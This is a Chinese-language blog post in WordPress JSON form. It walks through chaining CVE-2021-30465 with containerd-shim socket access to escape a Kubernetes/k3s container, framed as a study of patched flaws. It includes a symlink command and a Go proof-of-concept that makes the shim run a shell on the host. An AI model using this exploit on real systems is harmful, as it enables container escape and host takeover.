{"id":523,"date":"2023-07-17T22:47:56","date_gmt":"2023-07-17T14:47:56","guid":{"rendered":"https:\/\/h4ckm310n.com\/?p=523"},"modified":"2023-07-18T10:22:10","modified_gmt":"2023-07-18T02:22:10","slug":"%e8%a1%8d%e7%94%9f%e5%ad%a6%e4%b9%a0%ef%bc%9a%e5%88%a9%e7%94%a8cve-2021-30465%e8%ae%bf%e9%97%aecontainerd-shim-socket%e5%b9%b6%e5%ae%9e%e7%8e%b0%e9%80%83%e9%80%b8","status":"publish","type":"post","link":"https:\/\/h4ckm310n.com\/?p=523","title":{"rendered":"\u884d\u751f\u5b66\u4e60\uff1a\u5229\u7528CVE-2021-30465\u8bbf\u95eecontainerd-shim socket\u5e76\u5b9e\u73b0\u9003\u9038"},"content":{"rendered":"<p>\u5728\u4e4b\u524dCVE-2020-15257\u7684\u5b66\u4e60\u4e2d\u63d0\u5230\u4e86\u8be5\u6f0f\u6d1e\u7684\u4fee\u590d\u65b9\u5f0f\u662f\u628a\u539f\u672c\u7684\u62bd\u8c61socket\u66ff\u6362\u6210\u6587\u4ef6socket\uff0c\u8fd9\u6837\u8fd9\u4e9bsocket\u5c31\u80fd\u591f\u6536\u5230mount namespace\u7684\u9694\u79bb\u3002\u800c\u5229\u7528CVE-2021-30465\u53ef\u4ee5\u6302\u8f7d\u5bbf\u4e3b\u4e2d\u7684\u4efb\u610f\u76ee\u5f55\u5230\u5bb9\u5668\u4e2d\uff0c\u4e5f\u5c31\u662f\u8bf4\u5229\u7528\u8be5\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u628acontainerd-shim socket\u6240\u5728\u7684\u76ee\u5f55\u6302\u8f7d\u5230\u5bb9\u5668\u4e2d\uff0c\u4ece\u800c\u5b9e\u73b0\u5728\u5bb9\u5668\u4e2d\u8bbf\u95ee\u8fd9\u4e9bsocket\u5e76\u5b9e\u73b0\u9003\u9038\u3002<\/p>\n<p>\u524d\u7f6e\u9605\u8bfb\uff1a<br \/>\n<a href=\"https:\/\/h4ckm310n.com\/?p=341\" target=\"_blank\" rel=\"noopener\">CVE-2020-15257\u5b66\u4e60<\/a><br \/>\n<a href=\"https:\/\/h4ckm310n.com\/?p=413\" target=\"_blank\" rel=\"noopener\">CVE-2021-30465\u5b66\u4e60<\/a><br \/>\n<!--more--><br \/>\n\u9996\u5148\uff0c\u8ddfCVE-2021-30465\u7684\u590d\u73b0\u6b65\u9aa4\u4e00\u6837\uff0c\u521b\u5efa\u4e00\u4e2apod\u3002\u4e0b\u4e00\u4e2a\u521b\u5efa\u7b26\u53f7\u94fe\u63a5\u7684\u6b65\u9aa4\u6709\u4e00\u4e2a\u4e0d\u540c\u7684\u5730\u65b9\uff0c\u4e4b\u524d\u7684\u590d\u73b0\u6b65\u9aa4\u91cc\u662f\u6307\u5411\u5bbf\u4e3b\u6839\u76ee\u5f55\uff0c\u8fd9\u91cc\u6211\u76f4\u63a5\u6307\u5411\u7684\u662fcontainerd-shim socket\u6240\u5728\u7684\u76ee\u5f55\uff08\u5f53\u7136\u50cf\u4e4b\u524d\u90a3\u6837\u6307\u5411\u6839\u76ee\u5f55\u4e5f\u80fd\u591f\u8bbf\u95ee\u5230\u8fd9\u4e9bsocket\uff09\u3002<\/p>\n<pre>ln -s \/run\/containerd\/s\/ \/test2\/test2\r\n<\/pre>\n<p>\u540e\u9762\u7684\u6b65\u9aa4\u4e5f\u5dee\u4e0d\u591a\uff0c\u5229\u7528\u6761\u4ef6\u7ade\u4e89\u5c06\/run\/containerd\/s\/\u76ee\u5f55\u6302\u8f7d\u5230\u5bb9\u5668\u7684\/test1\/zzz\/\u4e0a\u3002<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-526\" src=\"https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount.png\" alt=\"\" width=\"1842\" height=\"212\" srcset=\"https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount.png 1842w, https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount-300x35.png 300w, https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount-1024x118.png 1024w, https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount-768x88.png 768w, https:\/\/h4ckm310n.com\/wp-content\/uploads\/2023\/07\/30465_shim_mount-1536x177.png 1536w\" sizes=\"auto, (max-width: 1842px) 100vw, 1842px\" \/><\/p>\n<p>\u8fdb\u5165\u6210\u529f\u6302\u8f7d\u76ee\u5f55\u7684\u5bb9\u5668\u91cc\uff0c\u4f7f\u7528\u8ddfCVE-2020-15257\u7c7b\u4f3c\u7684\u65b9\u5f0f\u5411\u5176\u4e2d\u4efb\u4e00socket\u53d1\u8d77\u8bf7\u6c42\u3002\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5728\u8fd9\u91cc\u7684\u73af\u5883\u4e2d\uff0ccontainerd\u9ed8\u8ba4\u7528\u7684\u662fv2\u7684shim\uff08\u4e4b\u524d\u7684\u590d\u73b0\u4e2d\u7528\u7684\u662fv1\uff09\uff0c\u4f7f\u7528\u8d77\u6765\u6709\u70b9\u533a\u522b\uff1a<\/p>\n<pre>package main\r\n\r\nimport (\r\n    \"context\"\r\n    \"net\"\r\n    \"github.com\/containerd\/ttrpc\"\r\n    shimapi \"github.com\/containerd\/containerd\/runtime\/v2\/task\"\r\n)\r\n\r\nfunc main() {\r\n    sock := \"\/test1\/zzz\/2665e78a394db764567c4690a5af0718ae0e0dc7292756ee8771295f69f4c7c7\"\r\n    container_id := \"f88a70eec15af27dbe668a5df963942b0d2fa6486209fab139e8278e6602f697\"\r\n    fs := \"\/var\/lib\/rancher\/k3s\/agent\/containerd\/io.containerd.snapshotter.v1.overlayfs\/snapshots\/157\/fs\/\"\r\n    \r\n    conn, _ := net.Dial(\"unix\", sock)\r\n    client := ttrpc.NewClient(conn)\r\n    shimClient := shimapi.NewTaskClient(client)\r\n    ctx := context.Background()\r\n    md := ttrpc.MD{} \r\n    md.Set(\"containerd-namespace-ttrpc\", \"notmoby\")\r\n    ctx = ttrpc.WithMetadata(ctx, md)\r\n\r\n    shimClient.Create(ctx, &amp;shimapi.CreateTaskRequest{\r\n        ID: container_id,\r\n        Bundle: \"\/run\/k3s\/containerd\/io.containerd.runtime.v2.task\/k8s.io\/\" + container_id,\r\n        Stdout: \"binary:\/\/\/bin\/sh?-c=\"+fs+\"shell\",\r\n    })\r\n}\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u5728\u4e4b\u524dCVE-2020-15257\u7684\u5b66\u4e60\u4e2d\u63d0\u5230\u4e86\u8be5\u6f0f\u6d1e\u7684\u4fee\u590d\u65b9\u5f0f\u662f\u628a\u539f\u672c\u7684\u62bd\u8c61socket\u66ff\u6362\u6210\u6587\u4ef6socke [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"default","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[16,6],"tags":[],"class_list":["post-523","post","type-post","status-publish","format-standard","hentry","category-16","category-6"],"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false},"uagb_author_info":{"display_name":"h4ckm310n","author_link":"https:\/\/h4ckm310n.com\/?author=1"},"uagb_comment_info":0,"uagb_excerpt":"\u5728\u4e4b\u524dCVE-2020-15257\u7684\u5b66\u4e60\u4e2d\u63d0\u5230\u4e86\u8be5\u6f0f\u6d1e\u7684\u4fee\u590d\u65b9\u5f0f\u662f\u628a\u539f\u672c\u7684\u62bd\u8c61socket\u66ff\u6362\u6210\u6587\u4ef6socke&hellip;","_links":{"self":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts\/523","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=523"}],"version-history":[{"count":3,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts\/523\/revisions"}],"predecessor-version":[{"id":527,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts\/523\/revisions\/527"}],"wp:attachment":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=523"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=523"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=523"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}